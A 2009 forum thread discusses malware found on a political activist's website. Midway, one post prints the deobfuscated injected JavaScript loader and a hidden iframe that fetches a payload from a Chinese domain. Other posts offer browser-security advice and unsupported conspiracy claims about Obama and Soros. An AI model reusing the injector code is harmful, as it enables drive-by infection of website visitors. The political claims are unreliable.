Posted on 08/09/2009 5:56:47 AM PDT by SvenMagnussen
On the night of July 31, I first noticed this alert at the website of Dr. Orly Taitz, Esq.:
On that date, July 31, 2009:
What happened when Google visited this site?
Of the 8 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-07-31, and the last time suspicious content was found on this site was on 2009-07-31.
Malicious software includes 2 scripting exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including cybercrime-protection.cn/, mcafee-malware.com/, security-alerts.cn/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including security-alerts.cn/.
(Excerpt) Read more at ohforgoodnesssake.com ...
I looked her site over, and also did a DNS lookup to see who was hosting it. Based on what I saw, the site is hosted by her registrar (NetworkSolutions), and I strongly suspect it was created using one of standard web page templates that Network Solutions offers free with registration.
Short version: I don't think there's a "webmaster" involved here. It looks like a DIY page, mostly likely do to her trying to save money for the fight. Perhaps any one of our freepers with good html skills could offer their services.
Last weekend, about every time I came to FR, I would get a notice of a Trojan from my antivirus software. This might explain those results. I haven’t had the problem since then, but I’ve been avoiding the birth certificate stories since then.
A lot of these happen on shared host servers. The webmaster dutifully cleans them up, but they and the other thousand or two sites on that server are promptly reinfected. The domain host generally stonewalls and denies any problem.
McAfee went nuts on my laptop when I went to her site. Never went again.
Lucianne.com blocked by Google because of a single bad link.
Free Republic prohibits third-party scripts of any sort, therefore is not susceptible to this type of shenanigan.
~~~ ~~~ ~~~ ~~~ ~~~
Is this really it? (re: possible Obama's Kenyan B.C. - Attny Taitz) Click on the link
That piece of line noise is obfuscated JavaScript that generates this little gem:function YuLQmW(cqGOKkKxg, paXoW, bRwOHYl){var SjTKsiaJe=bRwOHYl.split(paXoW);var NhAxBaVLcf='';for(qGST=0;qGST<(SjTKsiaJe.length-1);qGST++){ AXEMcaaiu = SjTKsiaJe[qGST]^cqGOKkKxg;NhAxBaVLcf += String.fromCharCode(AXEMcaaiu);}return NhAxBaVLcf;} function hjgksr(){var GncOozzc=new Function("QtBFdMu", "return "+YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f, 'U','299U288U300U314U290U298U289U315U')+"."+YuLQmW(-0x7- 0xe+0x14+0x3b1, 'G','978G991G980G969G')+"");var zotuOWV=GncOozzc(-0x1c+0x25-0x1-0x1f+0x2c- 0x14);zotuOWV.innerHTML += YuLQmW(0x4+0x30+0x2c- 0x25+0x0+0x4e, 'V','181V224V239V251V232V228V236V169V254V224V237V253V225V 180V184V169V225V236V224V238V225V253V180V184V169V235V230V2 51V237V236V251V180V185V169V239V251V232V228V236V235V230V25 1V237V236V251V180V185V169V250V251V234V180V174V225V253V253 V249V179V166V166V250V236V234V252V251V224V253V240V164V232V 229V236V251V253V250V167V234V231V166V234V240V235V236V251V1 66V224V231V167V234V238V224V182V189V174V183V181V166V224V23 9V251V232V228V236V183V');} if(window.addEventListener){window.addEventListener('load', hjgksr,false);}else if(window.attachEvent){window.attachEvent('onload', hjgksr);}
<iframe width=1 height=1 border=0 frameborder=0 src='http://security-alerts.cn/cyber/in.cgi?4'></iframe>
. I can tell you right now that Chinese site is up to no good. ~~~ ~~~ ~~~ ~~~ ~~~
As someone else said - the Wild Wooly Web is NOT anonymous nor without potholes - and as the LDot info shows, it's not just the site itself you have to worry about. I run all over the place with my Firefox and AdblockPlus & NoScript plugins, and have AVG, SuperAntiSpyware, and AdAware running on the system. I don't use Infernal Exploder except to visit Micro$oft, and so far have not had any infection since I brought this system live on XP-SP2 in Sept, 2007; but a lot of nasty stuff has been blocked.
Be careful out there. By the way, the offending exploit in Orly Taitz site has been taken off - for now. Considering Obama has his Acorn IT team in the White House I'm sure it's all coincidence that the 'anti-Obama' sites are getting hammered!
Even folks who hope she is right dislike her because she is such a gibbering idiot.
.
From Orly Taitz website:
‘There is no malaware sitting on my site, but George Soross son is sitting on Google board. He should look up the meaning of the word treason.’
I am creating a Flash-based websites. What countermeasures of inoculations can one install?
I am creating a Flash-based websites. What countermeasures or inoculations can one install?
I am creating a Flash-based websites. What countermeasures or inoculations can one install?
George Soross son is sitting on Google board
You have to be kidding me ?
This is turning into a nightmare.
So, Firefox routinely asks Google whether a site is dangerous, or not. This is the default behavior, though it can be turned off.
As I said, I don't trust Google.
The best option for something like this is a Firefox add on called “NoScript.” It won’t allow scripts to run without your permission. You can authorize safe sites, but it will automatically keep unknown third-party sites from running scripts like this.
I Hate Flash websites. Anyone who doesn't provide an alternative for bypassing the Flash doesn't want my business.
Not "flash-based" per se, but using Flash elements, which I am concerned might be hijacked by this method.
Well, then there is also that.
OK. When I hit a website,and I have to run Flash to do anything - no optional links to get in, I usually go somewhere else. If they have an option to enter without doing the Flash, I’ll be happy to visit.
I visited her website during the time it was supposedly contagious. Is it likely my machine got infected and if so what would the effects be?
To begin with you may want to make backups of all your important data files. Recently had to format my web browsing computer twice. First time I got hit on the same weekend South Korea was attacked. I was simply downloading a large file from the MegaDownload site. The second time some malware came through one of my online 3rd party applications. That was an attack on our 3rd party application that was hosted on a server in Slovakia. We were running an application written by a Spanish company. So we were vulnerable and may be a canary in a cold mine for other sites hosted on the hopefully better protected US servers. All seven of my websites are now hosted on US servers now and we don't run any foreign written php programs anymore. If you allow users to upload files you are very vulnerable. Personally I think China and Russia should be completely disconnected from the web.
Thanks for posting that site that will block them through a third party domain.
Very interesting. So given the nature of the malware at Orly’s site, would it have been possible to have gotten infected just by viewing the page in my browser? Or would it have required doing something more, like opening a link or downloading an image from there or something?
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.